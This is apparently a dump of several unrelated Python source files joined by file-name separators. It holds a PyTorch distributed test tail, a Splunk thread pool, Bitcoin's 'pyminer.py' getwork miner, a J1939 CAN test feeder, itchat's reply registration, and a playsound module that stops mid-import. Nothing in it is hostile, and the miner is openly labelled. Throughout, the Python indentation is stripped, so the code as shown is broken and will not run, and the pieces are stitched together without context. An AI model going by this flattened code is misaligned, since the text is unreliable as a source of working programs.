RuntimeError, "threads and devices must be passed in together"
):
no_device_pg = dist.new_group([0, 1], pg_options=no_device_pg_opts)
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_gloo()
def test_pass_gloo_options_and_timeout(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
store = c10d.FileStore(self.file_name, self.world_size)
        # Test that setting both timeout and pg_options errors out
with self.assertRaisesRegex(
RuntimeError, "timeout value defined in pg_options are conflicting"
):
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
timeout=timedelta(20),
pg_options=pg_opts
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
        # test that the process group is constructed with a high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
@requires_gloo()
def test_gloo_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="gloo", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "device_ids not supported"):
c10d.barrier(device_ids=[self.rank])
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
thread_pool.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A simple thread pool implementation
"""
import multiprocessing
import queue
import threading
import traceback
from time import time
from splunktalib.common import log
class ThreadPool:
"""
A simple thread pool implementation
"""
_high_watermark = 0.2
_resize_window = 10
def __init__(self, min_size=1, max_size=128, task_queue_size=1024, daemon=True):
assert task_queue_size
if not min_size or min_size <= 0:
min_size = multiprocessing.cpu_count()
if not max_size or max_size <= 0:
max_size = multiprocessing.cpu_count() * 8
self._min_size = min_size
self._max_size = max_size
self._daemon = daemon
self._work_queue = queue.Queue(task_queue_size)
self._thrs = []
for _ in range(min_size):
thr = threading.Thread(target=self._run)
self._thrs.append(thr)
self._admin_queue = queue.Queue()
self._admin_thr = threading.Thread(target=self._do_admin)
self._last_resize_time = time()
self._last_size = min_size
self._lock = threading.Lock()
self._occupied_threads = 0
self._count_lock = threading.Lock()
self._started = False
def start(self):
"""
Start threads in the pool
"""
with self._lock:
if self._started:
return
self._started = True
for thr in self._thrs:
thr.daemon = self._daemon
thr.start()
self._admin_thr.start()
log.logger.info("ThreadPool started.")
def tear_down(self):
"""
Tear down thread pool
"""
with self._lock:
if not self._started:
return
self._started = False
for thr in self._thrs:
self._work_queue.put(None, block=True)
self._admin_queue.put(None)
if not self._daemon:
log.logger.info("Wait for threads to stop.")
for thr in self._thrs:
thr.join()
self._admin_thr.join()
log.logger.info("ThreadPool stopped.")
def enqueue_funcs(self, funcs, block=True):
"""
        Run jobs in a fire-and-forget way; no result is handed
        back to clients.
        :param funcs: an iterable (tuple/list/generator) of callable objects
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return
for func in funcs:
self._work_queue.put(func, block)
def apply_async(self, func, args=(), kwargs=None, callback=None):
"""
:param func: callable
:param args: free params
:param kwargs: named params
        :param callback: called when func finishes without raising an exception
        :return: AsyncResult; clients can poll or wait for the result through it
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return None
res = AsyncResult(func, args, kwargs, callback)
self._work_queue.put(res)
return res
def apply(self, func, args=(), kwargs=None):
"""
:param func: callable
:param args: free params
:param kwargs: named params
        :return: whatever the func returns
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return None
res = self.apply_async(func, args, kwargs)
return res.get()
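    # Usage sketch (hypothetical caller code, not part of this module):
    #     pool = ThreadPool(min_size=2, max_size=8)
    #     pool.start()
    #     async_res = pool.apply_async(some_callable, args=(1, 2))
    #     value = async_res.get(timeout=30)  # blocks until done or raises TimeoutError
    #     pool.tear_down()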
def size(self):
return self._last_size
def resize(self, new_size):
"""
Resize the pool size, spawn or destroy threads if necessary
"""
if new_size <= 0:
return
if self._lock.locked() or not self._started:
log.logger.info(
"Try to resize thread pool during the tear " "down process, do nothing"
)
return
with self._lock:
self._remove_exited_threads_with_lock()
size = self._last_size
self._last_size = new_size
if new_size > size:
for _ in range(new_size - size):
thr = threading.Thread(target=self._run)
thr.daemon = self._daemon
thr.start()
self._thrs.append(thr)
elif new_size < size:
for _ in range(size - new_size):
self._work_queue.put(None)
log.logger.info("Finished ThreadPool resizing. New size=%d", new_size)
def _remove_exited_threads_with_lock(self):
"""
        Join threads that have exited since the last time resize() was called.
"""
joined_thrs = set()
for thr in self._thrs:
if not thr.is_alive():
try:
if not thr.daemon:
thr.join(timeout=0.5)
joined_thrs.add(thr.ident)
except RuntimeError:
pass
if joined_thrs:
live_thrs = []
for thr in self._thrs:
if thr.ident not in joined_thrs:
live_thrs.append(thr)
self._thrs = live_thrs
def _do_resize_according_to_loads(self):
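        # Resize policy: if the work backlog exceeds the number of idle threads, double
        # the pool size (capped at _max_size); if at least _high_watermark (~20%) of the
        # threads are idle and there are 2 or more of them, retire half of the idle ones,
        # staying above _min_size. This check runs at most once per _resize_window seconds.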
if (
self._last_resize_time
and time() - self._last_resize_time < self._resize_window
):
return
thr_size = self._last_size
free_thrs = thr_size - self._occupied_threads
work_size = self._work_queue.qsize()
log.logger.debug(
"current_thr_size=%s, free_thrs=%s, work_size=%s",
thr_size,
free_thrs,
work_size,
)
if work_size and work_size > free_thrs:
if thr_size < self._max_size:
thr_size = min(thr_size * 2, self._max_size)
self.resize(thr_size)
elif free_thrs > 0:
free = free_thrs * 1.0
if free / thr_size >= self._high_watermark and free_thrs >= 2:
# 20 % thrs are idle, tear down half of the idle ones
thr_size = thr_size - int(free_thrs // 2)
if thr_size > self._min_size:
self.resize(thr_size)
self._last_resize_time = time()
def _do_admin(self):
admin_q = self._admin_queue
resize_win = self._resize_window
while 1:
try:
wakup = admin_q.get(timeout=resize_win + 1)
except queue.Empty:
self._do_resize_according_to_loads()
continue
if wakup is None:
break
else:
self._do_resize_according_to_loads()
log.logger.info(
"ThreadPool admin thread=%s stopped.", threading.current_thread().getName()
)
def _run(self):
"""
Threads callback func, run forever to handle jobs from the job queue
"""
work_queue = self._work_queue
count_lock = self._count_lock
while 1:
log.logger.debug("Going to get job")
func = work_queue.get()
if func is None:
break
if not self._started:
break
log.logger.debug("Going to exec job")
with count_lock:
self._occupied_threads += 1
try:
func()
except Exception:
log.logger.error(traceback.format_exc())
with count_lock:
self._occupied_threads -= 1
log.logger.debug("Done with exec job")
log.logger.info("Thread work_queue_size=%d", work_queue.qsize())
log.logger.debug(
"Worker thread %s stopped.", threading.current_thread().getName()
)
class AsyncResult:
def __init__(self, func, args, kwargs, callback):
self._func = func
self._args = args
self._kwargs = kwargs
self._callback = callback
self._q = queue.Queue()
def __call__(self):
try:
if self._args and self._kwargs:
res = self._func(*self._args, **self._kwargs)
elif self._args:
res = self._func(*self._args)
elif self._kwargs:
res = self._func(**self._kwargs)
else:
res = self._func()
except Exception as e:
self._q.put(e)
return
else:
self._q.put(res)
if self._callback is not None:
self._callback()
def get(self, timeout=None):
"""
Return the result when it arrives. If timeout is not None and the
result does not arrive within timeout seconds then
multiprocessing.TimeoutError is raised. If the remote call raised an
exception then that exception will be reraised by get().
"""
try:
res = self._q.get(timeout=timeout)
except queue.Empty:
raise multiprocessing.TimeoutError("Timed out")
if isinstance(res, Exception):
raise res
return res
def wait(self, timeout=None):
"""
Wait until the result is available or until timeout seconds pass.
"""
try:
res = self._q.get(timeout=timeout)
except queue.Empty:
pass
else:
self._q.put(res)
def ready(self):
"""
Return whether the call has completed.
"""
        return self._q.qsize() > 0
def successful(self):
"""
Return whether the call completed without raising an exception.
Will raise AssertionError if the result is not ready.
"""
if not self.ready():
raise AssertionError("Function is not ready")
res = self._q.get()
self._q.put(res)
if isinstance(res, Exception):
return False
return True
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
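# bufreverse swaps the byte order within each 32-bit word of a buffer, and
# wordreverse reverses the order of the 32-bit words themselves; together they
# translate between the word ordering used by the getwork data and the byte
# ordering needed for SHA-256 hashing and the target comparison below.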
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
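        # getwork 'data' is 128 bytes (256 hex chars); the 80-byte block header occupies
        # the first 160 hex chars, with the 4-byte nonce at header bytes 76-79, i.e. hex
        # positions 152-159 -- the slice replaced below.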
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6668
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
feeder.py
|
import logging
import queue
import threading
import time
import j1939
from j1939.message_id import MessageId
from j1939.parameter_group_number import ParameterGroupNumber
logger = logging.getLogger(__name__)
class AcceptAllCA(j1939.ControllerApplication):
"""CA to accept all messages"""
def __init__(self, name, device_address_preferred, bypass_address_claim):
# old fashion calling convention for compatibility with Python2
j1939.ControllerApplication.__init__(self, name, device_address_preferred, bypass_address_claim)
def message_acceptable(self, dest_address):
"""Indicates if this CA would accept a message
(OVERLOADED FUNCTION)
This function indicates the acceptance of this CA for the given dest_address.
"""
return True
class Feeder:
"""
Simulated/mocked CAN message feeder for tests. Tests can use this class to specify
expected rx and tx messages via Feeder.can_messages. Overrides
j1939.ElectronicControlUnit.send_message, checking that tx message data matches
    expected data, and then injecting the expected rx message into the ECU.
"""
class MsgType(object):
CANRX = 0
CANTX = 1
PDU = 2
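    # Expected entry layout in self.can_messages (inferred from _async_can_feeder and
    # _send_message): (MsgType.CANRX, can_id, data, timestamp) for messages to inject,
    # and (MsgType.CANTX, can_id, data, ...) for messages the test expects to be sent.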
def __init__(self):
self.STOP_THREAD = object()
self.message_queue = queue.Queue()
self.message_thread = threading.Thread(target=self._async_can_feeder)
self.message_thread.start()
# redirect the send_message from the can bus to our simulation
self.ecu = j1939.ElectronicControlUnit(send_message=self._send_message)
def _async_can_feeder(self):
"""Asynchronous feeder"""
while True:
message = self.message_queue.get(block=True)
if message is self.STOP_THREAD:
break
recv_time = message[3]
if recv_time == 0.0:
recv_time = time.time()
self.ecu.notify(message[1], message[2], recv_time)
def _inject_messages_into_ecu(self):
while self.can_messages and self.can_messages[0][0] == Feeder.MsgType.CANRX:
message = self.can_messages.pop(0)
self.message_queue.put(message)
def _send_message(self, can_id, data):
"""Will be used instead of the usual ecu.send_message method.
        Checks the message sent and generates the appropriate answer.
The data is fed from self.can_messages.
"""
logger.info(
f'send message ID: {can_id:04x}, data: {["{:02x}".format(val) for val in data]}'
)
expected_data = self.can_messages.pop(0)
assert expected_data[0] == Feeder.MsgType.CANTX
assert can_id == expected_data[1]
assert data == expected_data[2]
self._inject_messages_into_ecu()
def _on_message(self, priority, pgn, sa, timestamp, data):
"""Feed incoming message to this testcase.
:param int priority:
Priority of the message
:param int pgn:
Parameter Group Number of the message
:param sa:
Source Address of the message
:param timestamp:
Timestamp of the message
:param bytearray data:
Data of the PDU
"""
logger.info(
f'received from sa {sa:02x} pgn {pgn:04x} data: {["{:02x}".format(val) for val in data]}'
)
expected_data = self.pdus.pop(0)
assert expected_data[0] == Feeder.MsgType.PDU
assert pgn == expected_data[1]
if isinstance(data, list):
assert data == expected_data[2]
else:
assert data is None
def pdus_from_messages(self):
self.pdus = []
for message in self.can_messages:
if message[0] is Feeder.MsgType.CANRX:
pgn = ParameterGroupNumber()
pgn.from_message_id(MessageId(can_id=message[1]))
self.pdus.append((Feeder.MsgType.PDU, pgn.value & 0xFF00, message[2]))
def accept_all_messages(
self, device_address_preferred=None, bypass_address_claim=False
):
# install a fake-CA to accept all messages
ca = AcceptAllCA(None, device_address_preferred, bypass_address_claim)
self.ecu.add_ca(controller_application=ca)
return ca
def receive(self):
self.ecu.subscribe(self._on_message)
self._inject_messages_into_ecu()
# wait until all messages are processed asynchronously
while len(self.pdus) > 0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.100)
self.ecu.unsubscribe(self._on_message)
def send(self, pdu, source, destination):
self.ecu.subscribe(self._on_message)
self.ecu.send_pgn(0, pdu[1] >> 8, destination, 6, source, pdu[2])
self.process_messages()
def process_messages(self):
# wait until all messages are processed asynchronously
while len(self.can_messages) > 0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.100)
self.ecu.unsubscribe(self._on_message)
def stop(self):
self.ecu.stop()
self.message_queue.put(self.STOP_THREAD)
self.message_thread.join()
|
register.py
|
import logging, traceback, sys, threading
try:
import Queue
except ImportError:
import queue as Queue
from ..log import set_logging
from ..utils import test_connect
logger = logging.getLogger('itchat')
def load_register(core):
core.auto_login = auto_login
core.configured_reply = configured_reply
core.msg_register = msg_register
core.run = run
def auto_login(self, hotReload=False, statusStorageDir='itchat.pkl',
enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if not test_connect():
logger.info("You can't get access to internet or wechat domain, so exit.")
sys.exit()
self.useHotReload = hotReload
if hotReload:
if self.load_login_status(statusStorageDir,
loginCallback=loginCallback, exitCallback=exitCallback):
return
self.login(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback,
loginCallback=loginCallback, exitCallback=exitCallback)
self.dump_login_status(statusStorageDir)
self.hotReloadDir = statusStorageDir
else:
self.login(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback,
loginCallback=loginCallback, exitCallback=exitCallback)
def configured_reply(self):
    ''' Determine the type of an incoming message and reply if a handler is registered for it.
    A somewhat crude heuristic is used to decide whether a message comes from a mass
    (MP) platform account; a better approach has not been found yet.
    The main concern is mismatching new friends added on the phone.
    If you have a better idea, please report an issue; it will be much appreciated.
    '''
try:
msg = self.msgList.get(timeout=1)
except Queue.Empty:
pass
else:
if msg['FromUserName'] == self.storageClass.userName:
actualOpposite = msg['ToUserName']
else:
actualOpposite = msg['FromUserName']
if '@@' in actualOpposite:
replyFn = self.functionDict['GroupChat'].get(msg['Type'])
elif self.search_mps(userName=msg['FromUserName']):
replyFn = self.functionDict['MpChat'].get(msg['Type'])
elif '@' in actualOpposite or \
actualOpposite in ('filehelper', 'fmessage'):
replyFn = self.functionDict['FriendChat'].get(msg['Type'])
else:
replyFn = self.functionDict['MpChat'].get(msg['Type'])
if replyFn is None:
r = None
else:
try:
r = replyFn(msg)
if r is not None:
self.send(r, msg.get('FromUserName'))
except:
logger.warning(traceback.format_exc())
def msg_register(self, msgType, isFriendChat=False, isGroupChat=False, isMpChat=False):
    ''' A decorator factory: returns a message-registration decorator
    configured with the information given. '''
if not isinstance(msgType, list):
msgType = [msgType]
def _msg_register(fn):
for _msgType in msgType:
if isFriendChat:
self.functionDict['FriendChat'][_msgType] = fn
if isGroupChat:
self.functionDict['GroupChat'][_msgType] = fn
if isMpChat:
self.functionDict['MpChat'][_msgType] = fn
if not any((isFriendChat, isGroupChat, isMpChat)):
self.functionDict['FriendChat'][_msgType] = fn
return _msg_register
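# Hypothetical usage sketch (not part of this module); registration typically looks like:
#     @core.msg_register('Text', isGroupChat=True)
#     def group_text_reply(msg):
#         return msg['Text']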
def run(self, debug=False, blockThread=True):
logger.info('Start auto replying.')
if debug:
set_logging(loggingLevel=logging.DEBUG)
def reply_fn():
try:
while self.alive:
self.configured_reply()
except KeyboardInterrupt:
if self.useHotReload:
self.dump_login_status()
self.alive = False
logger.debug('itchat received an ^C and exit.')
logger.info('Bye~')
if blockThread:
reply_fn()
else:
replyThread = threading.Thread(target=reply_fn)
        replyThread.daemon = True
replyThread.start()
|
playsound.py
|
import logging
logger = logging.getLogger(__name__)
_openedSoundsWin = []
class PlaysoundException(Exception):
pass
def _canonicalizePath(path):
"""
Support passing in a pathlib.Path-like object by converting to str.
"""
import sys
if sys.version_info[0] >= 3:
return str(path)
else:
# On earlier Python versions, str is a byte string, so attempting to
# convert a unicode string to str will fail. Leave it alone in this case.
return path
def _playsoundWin(sound, block = True):
'''
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
'''
sound = '"' + _canonicalizePath(sound) + '"'
from ctypes import create_unicode_buffer, windll, wintypes
from time import sleep
windll.winmm.mciSendStringW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.UINT, wintypes.HANDLE]
windll.winmm.mciGetErrorStringW.argtypes = [wintypes.DWORD, wintypes.LPWSTR, wintypes.UINT]
def winCommand(*command):
bufLen = 600
buf = create_unicode_buffer(bufLen)
command = ' '.join(command)
errorCode = int(windll.winmm.mciSendStringW(command, buf, bufLen - 1, 0)) # use widestring version of the function
if errorCode:
errorBuffer = create_unicode_buffer(bufLen)
windll.winmm.mciGetErrorStringW(errorCode, errorBuffer, bufLen - 1) # use widestring version of the function
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command +
'\n ' + errorBuffer.value)
logger.error(exceptionMessage)
raise PlaysoundException(exceptionMessage)
return buf.value
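    # The calls below drive Windows MCI with command strings of the form
    # 'open "<file>"', 'play "<file>" [wait]' and 'close "<file>"'.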
try:
logger.debug('Starting')
if (sound in _openedSoundsWin):
winCommand(u'close {}'.format(sound))
_openedSoundsWin.remove(sound)
winCommand(u'open {}'.format(sound))
winCommand(u'play {}{}'.format(sound, ' wait' if block else ''))
if not block:
_openedSoundsWin.append(sound)
logger.debug('Returning')
finally:
try:
if (block):
winCommand(u'close {}'.format(sound))
else:
pass
except PlaysoundException:
logger.warning(u'Failed to close the file: {}'.format(sound))
# If it fails, there's nothing more that can be done...
pass
def _handlePathOSX(sound):
sound = _canonicalizePath(sound)
if '://' not in sound:
if not sound.startswith('/'):
from os import getcwd
sound = getcwd() + '/' + sound
sound = 'file://' + sound
try:
# Don't double-encode it.
sound.encode('ascii')
return sound.replace(' ', '%20')
except UnicodeEncodeError:
try:
from urllib.parse import quote # Try the Python 3 import first...
except ImportError:
from urllib import quote # Try using the Python 2 import before giving up entirely...
parts = sound.split('://', 1)
return parts[0] + '://' + quote(parts[1].encode('utf-8')).replace(' ', '%20')
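# For example (hypothetical values): with the working directory '/tmp',
# _handlePathOSX('my song.mp3') would yield 'file:///tmp/my%20song.mp3'.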
def _playsoundOSX(sound, block = True):
'''
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
'''
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound could not find a copy of AppKit - falling back to using macOS's system copy.")
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
sound = _handlePathOSX(sound)
url = NSURL.URLWithString_(sound)
if not url:
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
for i in range(5):
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if nssound:
break
else:
logger.debug('Failed to load sound, although url was good... ' + sound)
else:
raise PlaysoundException('Could not load sound with filename, although URL was good... ' + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _playsoundNix(sound, block = True):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
sound = _canonicalizePath(sound)
# pathname2url escapes non-URL-safe characters
from os.path import abspath, exists
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
